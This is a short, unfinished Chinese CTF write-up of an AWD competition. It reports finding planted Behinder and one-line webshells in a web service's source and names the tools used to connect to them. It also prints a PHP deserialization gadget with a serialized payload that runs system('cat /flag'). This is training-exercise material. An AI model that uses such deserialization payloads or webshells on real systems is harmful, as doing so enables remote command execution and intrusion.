码迷,mamicode.com
首页 > 其他好文 > 详细

北极星杯 awd复现

时间:2019-10-26 01:43:55      阅读:194      评论:0      收藏:0      [点我收藏+]

标签:构造   一个   flag   this   扫描   down   cat   href   https   

北极星杯 awd复现

服务器共有3个web和一个pwn

web1

1,down下web1的源码,使用D盾扫描:

技术图片

2,漏洞1:发现三个冰蝎的木马,和一个一句话木马

冰蝎的后门需要使用冰蝎的客户端进行连接:如图:

技术图片

一句话木马直接使用菜刀或蚁剑连接即可:

技术图片

3,漏洞2:sqlhelper.php的反序列化漏洞:

<?php
class A{
    public $name;
    public $male;
    
    function __destruct(){
        $a = $this->name;
        $a($this->male);
    }
}

$s = new A;
$a = serialize($s);
echo $a;

技术图片

构造payload得:

O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};

未完,先睡觉。

reference:

https://yzddmr6.tk/posts/xm-one-year-awd/#more

北极星杯 awd复现

标签:构造   一个   flag   this   扫描   down   cat   href   https   

原文地址:https://www.cnblogs.com/v01cano/p/11741547.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!